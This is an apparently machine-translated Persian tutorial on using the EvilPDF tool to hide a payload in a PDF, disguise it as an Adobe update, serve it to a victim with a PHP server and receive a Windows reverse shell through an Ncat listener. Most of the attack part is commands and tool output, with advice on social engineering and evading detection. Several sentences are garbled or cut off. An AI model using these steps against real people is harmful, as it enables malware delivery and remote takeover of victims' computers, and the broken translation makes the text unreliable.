⚙️ راهنمای پیاده سازی پی لود PDF |

6 دقیقه

به نظر می‌رسد که برنامه‌های متعددی استفاده شده است. توسط هکرها

هکرها یک محموله (payload) را به PDF تزریق می کنند که به نظر قانونی و احتمالاً برای قربانی مهم است.

یکی از عواملی که باعث موفقیت این هک می شود این است که adobe reader یک پی دی اف خوان رایج در رایانه ها است. 19659006] با گذشت زمان، ابزارهای لینوکس برای جاسازی یک پی‌لود در یک پی‌دی‌اف، با تمرکز بر آسان‌تر کردن جاسازی آن پی‌لود، توسعه یافته‌اند. PDF، آن را برای قربانی ارسال کنید و دسترسی از راه دور به رایانه او دریافت کنید.

تزریق یک بار در pdf با استفاده از ابزار EvilPDF

این یک ابزار حداقلی پایتون است که برای جاسازی استفاده می شود. بارگذاری پی‌دی‌اف و راه‌اندازی شنونده

سازندگان ابزار بر روی آسان‌تر کردن حمله به پی‌دی‌اف تمرکز کردند

مرحله 1: ابزار EvilPDF را نصب کنید

اولین گام، شبیه‌سازی مخزن evilpdf از github است. [196590] ] ما از یک دستور معروف برای شبیه سازی یک مخزن استفاده خواهیم کرد.

 # git clone https://github.com/superzerosec/evilpdf
شبیه سازی به 'evilpdf' ...
از راه دور: شمارش اشیاء: 8، انجام شد.
از راه دور: شمارش اشیا: 100% (8/8)، انجام شده است.
از راه دور: فشرده سازی اشیاء: 100٪ (7/7)، انجام شده است.
کنترل از راه دور: مجموع 8 (دلتا 0)، استفاده مجدد 8 (دلتا 0)، بسته-استفاده مجدد 0
باز کردن اشیاء: 100% (8/8)، انجام شد 

مرحله 2: وابستگی های مورد نیاز را نصب کنید

پس از اتمام دانلود، باید وابستگی های لازم برای کار بدون خطا ابزار را نصب کنیم.

 سی دی evilpdf 

مرحله 3: ابزار evilpdf را اجرا کنید

اکنون ابزار evilpdf را برای شروع فرآیند تزریق بار به PDF اجرا می کنیم.

 python3 evilpdf.py 

مرحله 4: مسیر را مشخص کنید فایل پی دی اف قانونی

همانطور که در صفحه بالا نشان داده شده است، باید مسیر یک فایل پی دی اف قانونی را مشخص کنیم که در آن محموله را در آن جاسازی کنیم. مطمئناً همه جنبه‌ها قربانی را مجبور می‌کند که فایل را باز کند.

در اینجا باید مهارت‌های مهندسی اجتماعی خود را به کار ببرید

مرحله 5: فایلی را برای جاسازی بار انتخاب کنید

در این مرحله ما انتخاب می‌کنیم که کدام فایل را داشته باشیم. می خواهید در pdf جاسازی کنید. yload را با استفاده از metasploit، سپس فقط به مسیر آن در رایانه خود اشاره کنید.

 └─ $ python3 evilpdf.py

__________ .__.__ ________________ ___________
 _ _____ / __ _ | __ | |  ______  ______   _ _____ /
| __) _   / / | | | ___ / | |  | __)
| \ / | | | _ | | | ` | 
/ _______ /  _ / | __ | ____ / ____ | / _______ /  ___ /
 /  /  /

نسخه 1.1 کد شده توسط @linux_choice (توئیتر)
github.com/thelinuxchoice/evilpdf
[+] مسیر PDF (پیش‌فرض: adobe.pdf): /home/toxic/Desktop/lifeguide.pdf
[+] فایل سفارشی اضافه شود؟ [Y/n] n 

مرحله 6: نام فایل را انتخاب کنید

در این مرحله باید یک نام برای فایل انتخاب کنیم.

در مورد ما، می‌توانیم آن را adobe_update بنامیم

مرحله 7: نصب LHOST و LPORT

در اینجا باید میزبانی را که گیرنده روی آن اجرا می‌شود وارد کنید.

می‌توانید از دستور زیر استفاده کنید. LHOST خود را پیدا کنید

 ifconfig 

پس از تنظیم IP میزبان، باید یک پورت را انتخاب کنید. یک پورت کمتر متداول برای اطمینان از موفقیت حملات شما، زیرا پورت های رایج در حال حاضر توسط سرویس های موجود استفاده می شود و هر گونه فعالیت مخرب در آن پورت ها به راحتی شناسایی می شود. ورود شما در مرحله بعد این url فیشینگ، می‌توانید آن را در حالت پیش‌فرض همانطور که در زیر نشان داده شده است رها کنید و منتظر بمانید تا evilpdf به فرآیند جاسازی بار در PDF نیز ادامه دهد. هنگامی که فایل exe ما بارگیری شد به قربانی هدایت می‌شود.

مرحله 9: پی دی اف را برای دریافت پوسته تحویل دهید

پس از تکمیل فرآیند جاسازی بار در پی دی اف، اکنون باید سرور خود را در معرض نمایش قرار دهیم تا پی دی اف را به روشی ساده تر به دستگاه قربانی تحویل دهیم

Evilpdf راهنمای ما را ارائه می دهد. در مورد نحوه انجام این کار

در مورد ما، می‌توانیم از:

 php -S 192.168.0.11:3333 

] هنگام اجرای دستور در ترمینال

 php در زیر خروجی مشاهده کنیم. S 192.168.0.11:3333
[Tue Nov  9 04:33:07 2021] PHP 7.4.15 Development Server (http://192.168.0.11:3333) شروع شد 

اکنون می توانیم به مرورگر خود در دستگاه مقصد برویم و پیوند ارائه شده را وارد کنیم تا پی دی اف ما حاوی بار بارگیری شود.

. ] به محض اینکه قربانی فایل پی دی اف را که بنا به علایق قربانی نام آن را نامگذاری کردیم را باز کند، از کاربر می خواهد که تایید کند که آیا می خواهد این فایل را باز کند. یک اتصال از راه دور به رایانه قربانی

پس از اتصال، پوسته را دریافت می کنیم:

 [+] شنونده را شروع کنید؟ [Y/n] y
[+] اتصال گوش دادن:

Ncat: نسخه 7.80 (org / ncat "> https: // nmap> org / ncat)
Ncat: گوش دادن در ::: 4444
Ncat: Listening در 0.0.0.0:4444
Ncat: اتصال از 192.168.0.130.
Ncat: اتصال از 192.168.0.130:54784.
مایکروسافت ویندوز [Version 10.0.18361.889]
(ج) 2019 شرکت مایکروسافت. تمامی حقوق محفوظ است.

c:  Users  administrator  Downloads> dir
کارگردان
حجم در درایو C هیچ برچسبی ندارد.
شماره سریال جلد 7B9Y - 070D است

دایرکتوری C:  Users  administrator  Downloads
9/11/2021 4:24 ق.ظ .
9/11/2021 4:24 ق.ظ  ..
9/11/2021 4:26 AM 20,983,845 (توسط Adam-Grant) -Give-and-Take 

Conclusion

در آموزش فوق، ما توانستیم پی لود را به صورت PDF تزریق کرده و آن را بر روی قربانی اجرا کنیم. ماشین با دسترسی به

¯ _ (ツ) _ / ¯ توجه: اطلاعات برای تحقیق، آموزش یا ممیزی. استفاده برای منافع شخصی توسط قانون فدراسیون روسیه مجازات می شود.

را ببینید همچنین: